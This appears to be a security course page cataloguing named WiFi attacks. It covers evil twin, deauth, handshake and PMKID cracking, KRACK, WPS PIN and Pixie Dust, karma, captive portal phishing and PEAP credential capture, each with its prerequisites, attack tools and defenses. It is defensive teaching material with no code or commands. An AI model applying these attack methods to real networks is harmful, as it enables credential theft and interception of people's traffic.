12.03 · Wireless & IoT

Wireless Attacks

The catalog of named attacks against WiFi. Each one has a prerequisite, a move, and a specific defense. Memorize the names — they show up on every security cert and every pentest report.

WiFi attacks fall into three rough buckets: passive eavesdropping (someone listens), active deauth/disrupt (someone kicks clients off so they reconnect into a trap), and credential theft (someone captures handshakes or hashes and cracks them offline). The named attacks below are the ones that show up in real incident reports — not exhaustive, but the set any practitioner needs to recognize on sight.

Evil twin

Evil Twin AP
Active MitM · The most common WiFi attack against humans
Prereq
Attacker within RF range of victims. Knowledge of an SSID the victims trust (often guessable from public probe-request data).
Move
Attacker stands up an AP broadcasting the same SSID as the legitimate network, often on a different channel and at higher transmit power. Clients with that SSID in their saved-networks list auto-associate to whichever AP has the stronger signal. From there the attacker MitMs all unencrypted traffic and harvests credentials from any web form the victim submits.
Defense
For users: never auto-join open networks. Disable "auto-connect" on saved networks where possible. For enterprise: use 802.1X with mandatory RADIUS-cert validation — the cert is what binds the SSID to your network, not the SSID itself. PMF (Protected Management Frames) plus 802.11k/v/r make roaming legitimate APs distinguishable from rogues.

Deauthentication & disassociation

Deauth Flood
DoS · Setup for evil twin or handshake capture
Prereq
Attacker within RF range of victim. Knows victim BSSID and at least one client MAC (visible from any monitor-mode scan).
Move
Attacker sends forged 802.11 deauthentication frames pretending to come from the AP. Without PMF, the client can't verify the source — it complies and disconnects. Repeat at high rate to make the network unusable, or send a single deauth burst to force the client to reconnect and capture the 4-way handshake.
Defense
Protected Management Frames (PMF / 802.11w). Mandatory in WPA3, optional in WPA2. With PMF enabled, deauth and disassociation frames carry a MIC keyed by the session — forged frames are dropped. Every AP made after ~2018 supports it; turn it on.

Offline cracking flow

Handshake Capture + Offline Crack
Credential recovery · The classic WPA2-PSK attack
Prereq
Within RF range of a WPA2-PSK network with at least one active client. Tools: aircrack-ng or hcxdumptool + hashcat.
Move
Listen for a client connection (the 4-way handshake). If no one's connecting, send a deauth to force a reconnect. Capture all four EAPOL frames. Walk away. Run hashcat against the capture with a wordlist or rule-based mutator. The PSK never crossed the air, but everything needed to brute-force it offline did.
Defense
Long, random PSKs — 20+ chars from a generator. PMF prevents the deauth setup but not the passive capture. WPA3-SAE eliminates this attack class entirely because each guess requires a fresh online interaction with the AP.
PMKID Attack
Credential recovery · No deauth, no waiting
Prereq
A vulnerable AP — many WPA2-PSK APs include the PMKID in the first EAPOL message even with no client connecting. Tool: hcxdumptool.
Move
Attacker sends a single association request to the AP. AP responds with EAPOL message 1, which contains the PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC). That's everything needed to start cracking offline — no client needs to be online, no deauth required, no waiting.
Defense
Patch the AP to stop including the PMKID when not needed. Most modern APs do. Strong PSK and/or WPA3-SAE remain the durable answers.

Key-reuse attacks · KRACK

KRACK · Key Reinstallation Attacks
Active MitM · Vanhoef & Piessens, 2017
Prereq
MitM position between client and AP (attacker can intercept and forward frames). Unpatched client/AP.
Move
Attacker replays message 3 of the 4-way handshake. Buggy clients reinstall the already-installed PTK, which resets the nonce counter. With nonce reuse, the same AES-CCMP keystream encrypts different plaintexts — recoverable by XOR. Android & Linux were especially vulnerable because of a wpa_supplicant bug that installed an all-zeros key.
Defense
Patched in 2017-2018 across all major OSes and firmware. Modern devices are not vulnerable. Status today: historically important, no longer a live threat against patched devices.

WPS attacks

WPS PIN Brute Force
Credential recovery · Viehböck, 2011
Prereq
AP with WPS PIN authentication enabled. (Many consumer routers ship with it on by default.)
Move
The 8-digit PIN is verified in two halves of 4 digits, so the search space is 104 + 103 ≈ 11,000 instead of 108. Try every PIN with reaver. Once the PIN is recovered, the AP hands the attacker the actual WPA passphrase. Total time: hours.
Defense
Disable WPS entirely. It is the only correct answer. Some APs claim "lockout after N attempts" but the lockout is rate-limit not refusal — given time, the PIN falls.
Pixie Dust
Credential recovery · Bongard, 2014
Prereq
AP with WPS enabled and a vulnerable WPS implementation — particularly older Broadcom, Realtek, and Ralink chipsets whose PIN nonces use weak randomness.
Move
Capture the first two messages of the WPS exchange. Because the AP's nonces are predictable, you can derive the PIN offline. Many vulnerable APs fall in seconds. Tool: reaver with -K.
Defense
Same as above — disable WPS. Hardware-level fix would require new chipsets, which has happened for new APs but not for the millions of consumer routers still in service.

Reconnaissance · war driving

War Driving
Reconnaissance · A 2001-era term, still in use
Prereq
Vehicle, laptop or phone with monitor-mode capable WiFi card, GPS. Tools: Kismet, WiGLE app, Airodump-ng.
Move
Drive around collecting beacons. Each beacon advertises SSID, BSSID, channel, supported encryption. With GPS the attacker builds a map of every AP in a neighborhood, including which ones are WPA2/WPA3, which are still open, and which are still on WEP. Upload to WiGLE.net and your data merges with a 1+ billion-AP global database.
Defense
There's no defense against passive observation of your beacons — beacons exist to be seen. The actual defense is operational: don't be the WEP AP on the map. Audit your perimeter periodically; check WiGLE for what's broadcasting from your address.

Rogue APs & karma attacks

Rogue AP (insider variant)
Policy breach · The one the security team will actually catch
Prereq
An employee plugs an unmanaged AP into a corporate ethernet jack. Could be a personal travel router, a cheap consumer AP, or even a phone with hotspot bridged to ethernet.
Move
Not strictly an "attack" — the threat is that the rogue AP bypasses the organization's NAC and provides an undefended bridge from outside (WiFi) into inside (LAN). External attackers crack the rogue's PSK or use its open SSID; from there they're inside.
Defense
802.1X on every wired port. Wireless intrusion detection (WIDS) on enterprise APs scans for unfamiliar BSSIDs. Switchport security: bind MACs to ports. Periodic walk-around audits with a wireless scanner remain underrated.
Karma / Probe-Response Spoofing
Active MitM · Variant of evil twin
Prereq
Within RF range of victim devices. Tool: hostapd-wpe or WiFi Pineapple.
Move
Phones and laptops actively probe for every SSID in their saved-networks list. The attacker's AP answers "yes, I'm whichever SSID you're asking for." Vulnerable clients auto-associate. Originally devastating — modern OSes mitigate this by only auto-joining hidden SSIDs in specific cases, but many enterprise SSIDs are still trusted by name only.
Defense
Same as evil twin: 802.1X with cert validation. Remove saved open networks. Recent iOS and Android ignore probe responses for SSIDs configured as "no auto-join."

Captive portal phishing

Captive Portal Phishing
Credential theft · Hotel WiFi grade
Prereq
Evil twin already in place. Tool: WiFiPhisher.
Move
Victim joins the evil twin (which is open, no PSK required). Attacker's DHCP server hands out the rogue AP as the gateway. Any web request gets redirected to a captive-portal page that says "Please re-enter your WiFi password for security" or imitates a hotel/airport login form. Victim types corporate password or PSK. Done.
Defense
User education: legitimate WiFi never asks for the password after you've joined. Browsers showing HTTPS errors on captive portals are a feature, not a bug. Enterprise: deploy WPA3-Enterprise so password reuse on a coffee-shop SSID does nothing useful for the attacker.

Enterprise-specific · the cert-validation attack

802.1X / PEAP Credential Capture
Credential theft · The biggest gap in enterprise WiFi
Prereq
Enterprise SSID using PEAP-MSCHAPv2 or EAP-TTLS. Clients not configured to validate the RADIUS certificate against a specific CA + CN.
Move
Attacker stands up evil-twin AP with the same SSID, running hostapd-wpe or EAPHammer with a self-signed cert. Victim's phone or laptop attempts auto-join. Without cert validation, the client accepts the rogue cert and continues with the EAP handshake — sending the MSCHAPv2 challenge/response. MSCHAPv2 is offline-crackable. Attacker walks away with the user's domain credentials.
Defense
Deploy enterprise WiFi profiles that mandate RADIUS-cert validation with a specific CA fingerprint and server name. Use group policy on Windows, MDM on iOS/Android, or NetworkManager profiles on Linux. Without this configuration step, PEAP/MSCHAPv2 is no better than WEP. The strongest answer is EAP-TLS with per-user client certs.
The pattern across these attacks: the attacker rarely breaks the cryptography. They exploit the gap — clients that auto-join based on SSID name, APs that include PMKID for no reason, EAP methods deployed without cert validation, WPS turned on for "convenience." Most wireless defense is configuration policy, not new crypto.
Takeaway

Five things to walk away with: turn on PMF (defeats deauth-based setup), turn off WPS (closes the PIN attack class), require RADIUS cert validation on enterprise SSIDs (closes PEAP credential capture), use a strong PSK or WPA3-SAE (defeats offline cracking), and audit your perimeter (catches rogue APs and WEP holdouts).

Most of these are settings, not products. The hard part isn't knowing what to do — it's getting it deployed consistently across the BYOD fleet, the legacy APs, the printers that don't speak WPA3, and the IoT devices that don't speak anything secure at all.

Sources

  1. Vanhoef, M., & Piessens, F. (2017). Key reinstallation attacks: Forcing nonce reuse in WPA2. ACM CCS. https://www.krackattacks.com/
  2. Viehböck, S. (2011). Brute-forcing Wi-Fi Protected Setup. Self-published. https://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf
  3. Bongard, D. (2014). Offline bruteforce attack on Wi-Fi Protected Setup. PasswordsCon. https://www.youtube.com/watch?v=Ku-iRkUWb5g
  4. Steube, J. (2018). New attack on WPA/WPA2 using PMKID. Hashcat. https://hashcat.net/forum/thread-7717.html
  5. Bullock, B., & Kadijk, J. (2018). EAPHammer: targeted evil twin attacks against WPA2-Enterprise networks. https://github.com/s0lst1c3/eaphammer
  6. WiGLE. (2024). Worldwide wireless network mapping. https://wigle.net/